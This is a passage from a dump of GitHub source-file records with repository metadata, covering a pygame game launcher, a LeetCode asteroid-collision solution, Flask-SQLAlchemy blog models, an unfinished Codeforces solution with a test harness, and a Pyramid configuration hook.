        "HANDLERS": [
            {
                "module": "torngas.logger.CustomRotatingFileHandler",
                "filename": "access",
                "when": "W0",
                "encoding": "utf-8",
                "delay": False,
                "backupCount": 100,
            }
        ]
    },
}
|
[
"1063776603@qq.com"
] |
1063776603@qq.com
|
5c37a9079020b9f7860ca0f1c0674ef4efac94d4
|
3d05a382e418234558bed720ad5a56dbbf976a6a
|
/game.py
|
3e0a01bab1c9d7a87849d46d9b85a0652467a729
|
[] |
no_license
|
richwandell/tank-tennis
|
79354963197ea8469ecd90a682f1d522e5fd7c13
|
47e822d21b6ad3e0330f6f2427da56bf0043a668
|
refs/heads/master
| 2020-04-02T14:24:14.956038
| 2018-10-24T15:19:57
| 2018-10-24T15:19:57
| 154,523,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
from modules.stage import Stage
from modules.main_menu import MainMenu
import json, pygame
pygame.init()
pygame.mixer.init()
# Shared display surface and the active "world" (menu or stage).
screen, world = pygame.display.set_mode((0, 0),), {}

def showMenu():
    """Switch the active world to the main menu."""
    global world, screen
    world = MainMenu(screen)

def playLevel(level):
    """Load levels/level<level>.json and switch the world to that stage."""
    global world, screen
    # NOTE(review): the file handle from open() is never closed here.
    level1 = json.loads("".join(open("levels/level%s.json" % str(level)).readlines()))
    world = Stage(screen, level1)

if __name__ == "__main__":
    playLevel(1)
|
[
"richwandell@gmail.com"
] |
richwandell@gmail.com
|
69d4561868e7b4e9549331417be235f7bde6a826
|
45734abde30b437c2a1ba80653d7323e5c1d8c7f
|
/python/0735_asteroid_collision.py
|
c247bdeb01e2092efef3a66a280fd30416006c12
|
[] |
no_license
|
rdtr/leetcode_solutions
|
6629e03dd5b5fee15aaabe7f53204778f237ed96
|
51800d33c57e36ef62b6067d6f91a82c0e55dc6d
|
refs/heads/main
| 2022-05-21T12:17:23.201832
| 2022-03-12T09:20:46
| 2022-03-12T09:20:46
| 80,395,988
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 684
|
py
|
class Solution:
    def asteroidCollision(self, asteroids: List[int]) -> List[int]:
        """Simulate asteroid collisions; positives move right, negatives left.

        A left-mover collides with right-movers already on the stack; the
        smaller absolute size explodes, equal sizes destroy both.
        """
        surviving = []
        for rock in asteroids:
            while True:
                # Push when there is nothing to hit: empty stack, same
                # direction, or the new rock flies away from the stack top.
                if (not surviving or (rock > 0 and surviving[-1] > 0)
                        or (rock < 0 and surviving[-1] < 0)
                        or (rock > 0 and surviving[-1] < 0)):
                    surviving.append(rock)
                    break
                top = surviving[-1]
                if -rock > top:
                    surviving.pop()  # top explodes; keep checking downward
                    continue
                if -rock == top:
                    surviving.pop()  # both explode
                break  # otherwise the incoming rock explodes
        return surviving
|
[
"redtree.dev1112@gmail.com"
] |
redtree.dev1112@gmail.com
|
d6ffee8f77d0617d1af183ab560feda3653eec61
|
dc77f52db640fca23aa66be30f15378b09b205c1
|
/pitchblog/models.py
|
45de23c490eadfdabcd69a5f5c5b4b14e71aed09
|
[
"MIT"
] |
permissive
|
marysinaida/PITCH_SITE
|
233feb0401bc52c17d0f9e91a66c5f46829b1215
|
95d141baf92a24ce8273ca10b9ee64498d6f22dd
|
refs/heads/master
| 2020-09-15T22:57:14.343802
| 2019-11-26T13:25:36
| 2019-11-26T13:25:36
| 223,576,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 978
|
py
|
from datetime import datetime
from pitchblog import db
class User(db.Model):
    """Application user; ``posts`` is the one-to-many link to Post."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(25), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # Avatar filename on disk; a default image is used until one is uploaded.
    image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
    password = db.Column(db.String(60), nullable=False)
    posts = db.relationship('Post', backref='author', lazy=True)

    def __repr__(self):
        # Bug fix: ``f(...)`` called a nonexistent function (NameError at
        # runtime); it was meant to be an f-string literal.
        return f"User{self.username} {self.email} {self.image_file}"
class Post(db.Model):
    """A blog post authored by a User (via the ``author`` backref)."""
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(100), nullable=False)
    # Defaults to the creation time; note the callable is passed, not called.
    date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
    content = db.Column(db.Text, nullable=False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)

    def __repr__(self):
        # Bug fix: ``f(...)`` called a nonexistent function (NameError at
        # runtime); it was meant to be an f-string literal.
        return f"Post{self.title} {self.date_posted}"
|
[
"marydorcassinaida54@gmail.com"
] |
marydorcassinaida54@gmail.com
|
d50b30de4699270bdccde2ab4e9bc05670de33f4
|
4a8c1f7d9935609b780aff95c886ef7781967be0
|
/atcoder/_codeforces/1324_f.py
|
057771514859b798e0ba37f2a0eda18a50f48caf
|
[] |
no_license
|
recuraki/PythonJunkTest
|
d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a
|
2556c973d468a6988d307ce85c5f2f8ab15e759a
|
refs/heads/master
| 2023-08-09T17:42:21.875768
| 2023-07-18T23:06:31
| 2023-07-18T23:06:31
| 13,790,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
    """Read the tree input and tally each vertex's degree into ``score``.

    NOTE(review): the function reads n, the per-vertex values, and the n-1
    edges, but never prints anything, while the accompanying test expects
    printed output -- the solution appears unfinished.
    """
    n = int(input())
    # Per-vertex 0/1 values; currently unused.
    dat = list(map(int, input().split()))
    v = []
    for i in range(n+1):
        v.append([])
    score = [0] * (n)
    for i in range(n-1):
        # Edges are 1-based in the input; stored 0-based as an adjacency list.
        a, b = map(int, input().split())
        v[a-1].append(b-1)
        v[b-1].append(a-1)
    for i in range(n):
        # score[i] ends up as the degree of vertex i.
        for x in v[i]:
            score[i] += 1
class TestClass(unittest.TestCase):
    """stdin/stdout harness: feeds ``input`` to resolve() and compares output."""

    def assertIO(self, input, output):
        # Swap the real std streams for StringIO so resolve() reads the
        # given input and its prints are captured.
        stdout, stdin = sys.stdout, sys.stdin
        sys.stdout, sys.stdin = StringIO(), StringIO(input)
        resolve()
        sys.stdout.seek(0)
        out = sys.stdout.read()[:-1]  # drop the final character (trailing newline)
        sys.stdout, sys.stdin = stdout, stdin
        self.assertEqual(out, output)

    def test_input_1(self):
        print("test_input_1")
        input = """9
0 1 1 1 0 0 0 0 1
1 2
1 3
3 4
3 5
2 6
4 7
6 8
5 9"""
        output = """2 2 2 2 2 1 1 0 2 """
        self.assertIO(input, output)
if __name__ == "__main__":
unittest.main()
|
[
"glenda.kanai@gmail.com"
] |
glenda.kanai@gmail.com
|
a98077b547dbb92b9a08eedcba16e8d2d205d6c9
|
5312a19268af0f9ab2c319e46f8d460d64e6e898
|
/arche_m2m/__init__.py
|
55dbc9d8dab7729058fa4d83f25791c76e161c1c
|
[] |
no_license
|
GlobalActionPlan/arche_m2m
|
2b1bf57b89bb398d747966a5d094c40c6df66916
|
698381888ff55ec72f0027596c5afd9c9b6a3e78
|
refs/heads/master
| 2021-01-10T20:47:04.159490
| 2017-06-09T12:54:53
| 2017-06-09T12:54:53
| 23,307,596
| 1
| 0
| null | 2020-02-10T08:16:35
| 2014-08-25T08:49:12
|
Python
|
UTF-8
|
Python
| false
| false
| 335
|
py
|
from pyramid.i18n import TranslationStringFactory
_ = TranslationStringFactory('arche_m2m')
def includeme(config):
    """Pyramid inclusion hook: wire up every arche_m2m sub-package, then
    register the package's translation directory."""
    for component in ('.ttw_translations', '.models', '.schemas',
                      '.views', '.permissions'):
        config.include(component)
    config.add_translation_dirs('arche_m2m:locale')
|
[
"robin@betahaus.net"
] |
robin@betahaus.net
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.